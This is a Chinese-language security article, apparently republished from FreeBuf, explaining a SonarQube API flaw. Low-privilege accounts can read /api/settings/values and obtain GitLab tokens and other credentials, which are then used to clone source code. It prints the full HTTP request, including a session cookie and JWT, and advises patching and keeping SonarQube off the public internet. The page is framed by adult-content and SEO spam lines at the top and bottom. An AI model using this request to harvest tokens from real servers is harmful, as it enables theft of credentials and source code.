成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

SonarQube API越權(quán)漏洞的思考

作者:Glocksec
安全 漏洞
SonarQube是一款基于Web的工具,是一個(gè)開源的代碼質(zhì)量管理系統(tǒng),可幫助開發(fā)人員生成沒有安全問題、錯(cuò)誤、漏洞、異常和一般問題的代碼。

?[[433918]]?

SonarQube是一款基于Web的工具,是一個(gè)開源的代碼質(zhì)量管理系統(tǒng),可幫助開發(fā)人員生成沒有安全問題、錯(cuò)誤、漏洞、異常和一般問題的代碼。

如果您在開發(fā)一個(gè)小項(xiàng)目,那可能很容易,您可以仔細(xì)檢查代碼以發(fā)現(xiàn)任何問題。SonarQube屬于SAST類的代碼檢測(cè)工具,更側(cè)重于質(zhì)量檢查,也有一些針對(duì)性的安全檢測(cè),比如SQL注入等,我用過商業(yè)版,試圖利用SAST來發(fā)現(xiàn)和解決代碼安全問題,比較失望。規(guī)則庫比較弱,自定義能力差,畢竟只是更專注于質(zhì)量檢查。

大背景

近期,境外網(wǎng)站又報(bào)道了一些涉及中國(guó)多個(gè)機(jī)構(gòu)和企業(yè)的代碼泄漏,就是利用SonarQube的這個(gè)API越權(quán)漏洞進(jìn)行的。

(1)The Chinese Ministry of Public Security 

   

(2) BOSCH 博世 

 

(3) 梅賽德斯奔馳

SonarQube API 未授權(quán)下載源代碼漏洞利用過程及原理

SonarSource SonarQube由于存在安全漏洞,攻擊者可利用該漏洞通過API設(shè)置值URI,發(fā)現(xiàn)明文的SMTP和GitLab憑證(tocken)等敏感信息泄露,可導(dǎo)致gitlab中項(xiàng)目的代碼可以被任意clone下載,其實(shí)這個(gè)漏洞在2019年就被發(fā)現(xiàn)了。官方修復(fù)過一次,但是又出現(xiàn)了新的漏洞,并且一直延伸到7-8-9多個(gè)版本。

漏洞細(xì)節(jié):

漏洞利用過程及證明:
(1)敏感配置泄漏:
以普通用戶登陸就可以查看該AP I信息,如下:
GET /api/settings/values HTTP/2
Host: sonar.******.com
Cookie:    experimentation_subject_id=ImExZjYyYTg4LTUwMmEtNDllOS1hNDNhLTZkYjc3OWVhNDM3YiI%3D--5753e714d025d34f4249d6d9d8cc7292ca0200b6; XSRF-TOKEN=5n4f4tq6qi30hg65n2h0qth56e; JWT-SESSION=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJBWGpaWGotUmlDeWV5OUM0SnkwbCIsInN1YiI6ImZlbmd3ZWlndW8iLCJpYXQiOjE2MTg1NTQ1MzUsImV4cCI6MTYxODgxMzczNSwibGFzdFJlZnJlc2hUaW1lIjoxNjE4NTU0NTM1ODI1LCJ4c3JmVG9rZW4iOiI1bjRmNHRxNnFpMzBoZzY1bjJoMHF0aDU2ZSJ9.5GEbBs6oJnoRYnSbPC3BUysSZgy5tIu-LOuO7iOSEGI
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (KaliLinux; ARM) AppleWebKit/637.36 (KHTML, like Gecko) Chrome/189.0.4389.90 Safari/637.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

官方進(jìn)行過修復(fù)然后該接口應(yīng)該只允許管理員可查看。
但是很多內(nèi)置了默認(rèn)賬號(hào)和簡(jiǎn)單弱口令賬號(hào)同樣可查看。

(2) 利用該user_token可以來從gitlab獲取代碼:

看,就是sonar.gitlab.user.token , 直接可以拉代碼數(shù)據(jù)。

還能通過配置文件看到數(shù)據(jù)庫賬號(hào)密碼等。非常久遠(yuǎn)的漏洞了。

看看如何利用sonar.gitlab.user.token 拉代碼:

解決辦法

關(guān)注廠商官方網(wǎng)站,即使升級(jí)補(bǔ)丁。

友情提醒

看看至少有多少暴露在公網(wǎng):數(shù)量還是很驚人的,這么多假裝在乎代碼質(zhì)量的用戶,不在乎安全性個(gè)代碼泄露。

SonarQube 不建議對(duì)公網(wǎng)開放,Devops流程中如需要使用SAST請(qǐng)采用專業(yè)的工具,請(qǐng)棄用SonarQube。

 

責(zé)任編輯:趙寧寧 來源: FreeBuf
漏洞SonarQube安全工具
相關(guān)推薦

2023-03-02 13:32:17

應(yīng)用安全網(wǎng)絡(luò)安全Web應(yīng)用

2021-04-21 08:00:00

Web工具漏洞

2020-09-01 07:58:34

API漏洞黑客

2015-10-13 09:13:42

2021-08-09 08:20:59

API安全測(cè)試漏洞

2021-01-08 13:37:25

API網(wǎng)關(guān)API開發(fā)平臺(tái)數(shù)據(jù)庫

2021-08-09 11:35:40

設(shè)計(jì)實(shí)踐應(yīng)用

2020-12-18 10:04:52

API漏洞應(yīng)用程序編程接口

2023-07-26 17:13:38

2021-10-18 10:29:15

API漏洞網(wǎng)絡(luò)安全

2021-09-01 15:48:50

API漏洞應(yīng)用程序安全

2020-05-29 09:36:59

越權(quán)訪問漏洞Web安全

2022-12-08 10:33:48

2022-05-27 17:30:46

漏洞網(wǎng)絡(luò)攻擊

2023-07-21 14:04:37

2023-09-04 18:57:01

API接口數(shù)據(jù)中心

2021-12-26 07:24:54

Log4j安全漏洞漏洞

2017-02-17 08:14:27

2025-01-22 12:37:21

2022-04-19 08:26:20

WebAPI架構(gòu)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 国产一区视频在线 | www.日本国产 | 久久久精品 | 中文字幕在线二区 | 成人免费视频网站 | 色资源站 | 午夜三级在线观看 | 在线日韩视频 | 91久久伊人 | 亚洲免费精品 | 毛片a区 | 久久久久一区二区三区 | 日日干干 | 日韩欧美国产不卡 | 中文字幕视频在线看5 | 91精品国产91久久久久久吃药 | 精品乱人伦一区二区三区 | 欧美一级做性受免费大片免费 | 国产精品自拍av | 毛片高清 | 99精品视频在线观看 | 日韩手机视频 | 一区二区三区视频 | 99草免费视频 | 欧美日韩一区在线观看 | 欧美亚洲一区二区三区 | 亚洲第一在线 | 亚洲一二三区精品 | 在线色网站| 伊人伊人| 视频一二区 | 在线观看黄色电影 | 久久精品国产v日韩v亚洲 | 91亚洲精品在线 | 91视频中文 | 国产乱码精品一区二区三区五月婷 | 亚洲最大成人综合 | 999热视频 | 午夜免费电影院 | 亚洲日日操 | 一区二区在线免费观看 |